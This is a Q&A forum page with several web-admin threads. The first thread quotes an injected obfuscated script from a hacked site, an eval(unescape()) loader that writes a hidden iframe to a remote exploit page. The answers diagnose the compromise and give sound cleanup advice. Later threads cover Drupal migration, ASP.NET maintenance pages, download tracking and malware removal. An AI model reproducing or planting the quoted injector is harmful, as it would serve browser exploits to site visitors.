RSS won't update - rss

My feed is broken: Feed Validator says this portion is the problem. Any thoughts?
]]>content:encoded>
wfw:commentRss>http://sweatingthebigstuff.com/2010/01/21/5-steps-to-get-out-of-debt/feed/wfw:commentRss>
slash:comments>2/slash:comments>
/item>
/channel>
/rss>
script language="javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%73%73%39%77%38%73%38%39%78%78%2E%6F%72%67%2F%69%6E%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E%27%29%3B"))</script>

<script language="javascript">eval(unescape("%64%6F%63...
You've been hacked. An attacker has compromised your site and added this script to the bottom of some of your pages (probably all of them, judging by your main site). It loads a bunch of exploit code against web-browsers and plugins that attempts to infect other people's computers. That it also results in the RSS being invalid is a side-effect.
You need to get the site off-line before it infects more people, then work on the clean-up, which will depend on how they compromised it/what kind of server it is. Certainly at the very least you will need to delete your current site code and upload fresh new scripts, from a machine you know is clean(*), with all your passwords changed. If it's your your own [virtual] server you will need to check that the server itself hasn't been rooted.
(*: a very common way sites are getting compromised at the moment is through hacked client machines running FTP. The trojans steal the FTP passwords when you connect. So you need to check and disinfect every machine you might have used to connect to the site. And if you find anything suspicious on one of them, don't trust AV tools to completely clean it, because today they just can't keep up with the quantity of malcode out there. Re-install the operating system instead.)

Related

Drupal multi-site to single-site go-live

I have a colleague asking me to provide a single tarball containing an entire Drupal site, which they can drop on their server with no configuration beyond connecting the database.
To my knowledge this is not possible.
To further complicate the issue, the site is currently developed as a multi-site install and the colleague needs it provided as a single-site install. This is a conversion I've done countless times, but I've always completed the process on the destination environment, because Drupal multi-sites need a proper domain pointed at them to function. There's no way for me to confirm that the site will work at the new location without actually testing it on that environment first, so I don't think I can fulfill this request.
Am I missing something? Is this in fact possible to achieve?
I don't see why this isn't possible.
In regards to the drop in install, as long as you include the settings.php file and a copy of the DB that they import, that is all they should need as long as their webserver is configured properly (such as pretty URLs and the like). Certainly their are a few considerations to take when doing this, you need to make sure the DB connection path is done in relation to localhost (or however they have it) and that when you tarball it together, that you have the right permissions set up for the destination machine, otherwise though, moving a drupal install is really not that difficult and can be just that simple.
Depending upon how 'drop in' they want it, you could write a little script to automate and verify the install. Have the script import a copy of the DB, redo the permissions and owner of the files on destination host, and reload apache.
As far as the multi-site to single site is concerned, I would just do the conversion in a sandbox and set up the domain you need in /etc/hosts (as shown here). This will simulate the destination domain well enough that you can make sure the install is working before sending it off.
Hope that helps.

How do I take a .NET site down for maintenance?

I have an ASP.NET site that I'm going to have to take down to make some major structural updates to, and I was wondering how I should go about it from the client-side perspective. I have heard of an App_Offline.htm file or something like that, but I've never really gotten that to successfully work. Does anyone know how to do this?
EDIT
My app is running ASP.NET 4.0, for what it is worth.
Rather than messing with the app_offline silliness (among other reasons, you can't continue to see the site internally while performing maintenance), I created an additional "down for maintenance" site in IIS, which is normally stopped. It has the same IP, host headers, etc as the main site, but only has a default.aspx, an images folder and a stylesheet. That file contains the "This site will be down for maintenance until xx:xx PM CST" message.
When I'm ready to perform the update, I stop the main site and start the maintenance site, which then processes any requests it receives and, of course, returns the maintenance message.
When the maintenance is complete, stop the maintenance placeholder site, and restart your main site.
If you're using host headers, you can modify this approach so that the site remains internally accessible over your LAN/WAN while the maintenance site is handling external requests. A simple approach is to remove the host headers for <*>.yourdomain.com from the main site before starting the maintenance site, and ensure that the main site has an additional host header that is internally accessible (added to your local hosts file, for instance). When you start the maintenance site, it'll handle external requests while the primary site will handle requests to the internal-only header.
Alternatively (this seems complex, but saves you the trouble of adding and removing headers), create three sites:
Main site: Configured as in normal operation.
Maintenance site: Has same IP, host headers, etc as main site, but only contains default "down for maintenance" page and any images, css, etc that are required.
Internal test site: Duplicates the configuration of the main site and points to the same folders, but only has host headers,etc for an internal name that is not in the public DNS.
This way, you have only to stop the main site and start the other two in order to funnel external traffic to the "down for maintenance" site, while you can still see and tweak the primary site. This is helpful for that last few minutes of testing/bug fixing that tends to come up during a deployment.
Update
If you don't have access to the server or IIS Manager, you most likely won't be able to use any of that. Assuming that your access is limited to your own folder, your options seem to be either to deploy app_offline.htm to the root of the site (ASP.NET checks for that filename), or to just replace the whole site with a "down for maintenance" app. Perhaps someone else will chime in with alternatives.
The trick for IE is to push over the wire particular count of bytes otherwise IE shows not so friendly 404 error anyway. here is more details: http://weblogs.asp.net/scottgu/archive/2006/04/09/442332.aspx
If you have a good pre-release testing process and careful release procedures you probably won't be down for long.
In that case dropping a file called App_Offline.htm into your site root works fine. IIS will replace your site with it until you remove it. It's a painless way of making sure nothing's updating while you transition.
Mine just has a header with the site logo and a message that we'll be down for maintenance for up to twenty minutes. That's it. It took me about five minutes to write IIRC.
I would definitely recommend this for short sharp down periods of less than half an hour. Anything longer and you're probably looking at a major system change that warrants an approach like David Lively's.

How to track a completed file download in ASP.NET

I have this ASP.NET web site that allows users to download program installation packages (just normal files). I want to be able to track when a download is completed (i.e. the file has been fully downloaded to the user's computer) and then invoke a Google Analytics script that reports a completed download as a 'Goal' (obviously, one of my goals is to increase file downloads).
The problem is that I need to support direct file URLs, as opposed to the "redirect page" solution. This is because a lot of traffic comes from software download sites that explicitly demand a direct file URL when submitting a product. Perhaps, they do their own file analysis (i.e. virus checking). But with this set of limitations, a typical scenario is:
The user visits my product listing on a software download site
The user clicks the "Download" button on this site
The "Download" page is typically a redirect that finally brings the user to my file via the direct URL I've initially submitted, i.e. http://www.ko-sw.com/somefile.exe
If under these conditions, an exact solution for monitoring is not possible, maybe there exists a workaround? What comes to my mind is temporarily storing the number of performed downloads on the server and then accessing an administrative page that somehow reports this number to Google Analytics and finally sets it back to zero. With this workaround, there is at least no need to try to attach a javascript handler to a non-HTML resource. But even then there are issues:
How to track if a download has completed?
How to track user geolocation and browser capabilities to make them further visible in the reports?
Thanks everybody in advance
According to awstats aborted download has http status code 206 so if you analyze server log for such code you can get those downloads that were not completed.
#Kerido ~ I'm curious what the business case is here. Are you trying to track installs or downloads? If installs, go with #SamMeiers solution.
However, if you're trying to track downloads, then the next question is what webserver base are you using? IIS? Apache? Something else?
In IIS, assuming you're using 7 (or later), you could (easily?) write a HttpHandler that checks for the last bytes of the file to be sent, and on that, record a log somewhere.
On Apache, just setup logging to tell you how many bytes were transferred (a trivial change in httpd.conf) and then parse the logs daily (awstats [amongst others] is pretty good for this, but you might have to write a sed/awk script) and find out how many full transfers were completed. Just depends on how thorough you're trying to be.
But I go back to, what's the business case for this? What does it matter if there were unfinished downloads?
It's possible to track links as a goal, which may be of use to you. However, this won't track when the download was completed.
http://www.google.com/support/analytics/bin/answer.py?answer=55529
Hope this helps.
Cheers
Tigger
I think the solution of #SamMeiers is very good but you may optimized by calling a web services after the installation complete but you might find a small problem if the use installing the app in an environment without internet but you might force to check if there is an internet or not.
You can create any trigger when you installation start as a start flag then when if finish check if the start flag exists then the app have been downloaded and installed also.

How to prevent Iframe hack

my site is hosted in lunarpage and it geting hacked in from few month.
i have done all things some of site saying (changing password like).
finally 2 weeks ago i have blocked all ranges of Chinese ips.
but today it again hacked.
is there is any way to prevent Iframe hack?
If you're changing your passwords and the site still gets hacked, you might have a virus on your machine. I am not joking, I saw this once.
Just to make sure, request the FTP logs from the hosting (you may see some other machines connecting to your account)
Given your comment
Iframe hack is famos sql injection
attack. mainly from .cn domains
Identify SQL injection vulnerabilities in your system
Close them (switching to parametrised queries is a good idea if you haven't already)
You could also use mod_security or similar to try to stop attacks before they get to your web application. I've experienced false positives though (as a user, and only with ASP.NET systems (note this is a tiny sample size)).
The question isn't so much about the iframe as how it got there and how to get rid of it. I believe what has happened is that you have stored your passwords in your FTP client. You have a trojan on your computer and it mines the passwords from the FTP client and then uploads the iframe to your index file. Also check your 404 file, if you have one. It will likely be there, too.
Here's what you need to do. First, get rid of the trojan on your computer. I suggest looking for this, "PWS:Win32/Daurso.gen!A" and delete it. Then go to your site(s) and remove the iframe from all pages. Next, change all of your passwords. Lastly, do not store the new passwords in your FTP client or anywhere else on your computer.
By the way, don't visit the URL listed in the iframe. It loads a ton of spyware. To get rid of spyware, I suggest using Malwarebytes (free). Use the full scan when you have time. It takes a long time (hours), if you have a lot of files.
Good luck.

Do you know any tools to remove badware, malware from my website which google blocks?

I have a website which google blocked because it had badware i removed the viruses from the server and its completely clean now, the problem that this virus changed in the html, js asp files in the site and added hidden iframes and strange scripts, i removed all what i found in the diles, but the website is toooo big, so any one have any tool which i can use to remove all the effects of this badware?
google gave me this site as a reference to remove the badware from my site
http://www.stopbadware.org/home/security
Thanks,
Wipe everything from the server, check all the files, and re upload them if they're clean. Only thing you can do.
Upload the latest version of the site from your source control DB. If you dont follow source control, its high time you start doing it. ;-)
Find a good search and replace tool. If you are using Dream weaver then you can do a site wide search. The same is applicable to Visual Interdev as well.
+1 William's comment. You can do a simple grep for characteristic strings your particular infection has left behind, such as “<iframe” or the start of the encoded scripts, but you can't be sure to find all the changes that have happened without a manual inspection. This is what having a clean copy on your local computer is for.
i removed the viruses from the server
Really? Are you clean of rootkits? How can you be sure? After an infection, the only sure-fire way to recover a clean server is to reinstall everything on it from the operating system upwards.
Have you discovered and fixed the method the intruders used to get in? If not, you can be sure another of the Russian malware gangs' automated exploits will be back soon enough.
Try soswebscan
scan your website at free of cost with soswebscan.
For more details visit soswebscan website : http://soswebscan.jobandproject.com

Resources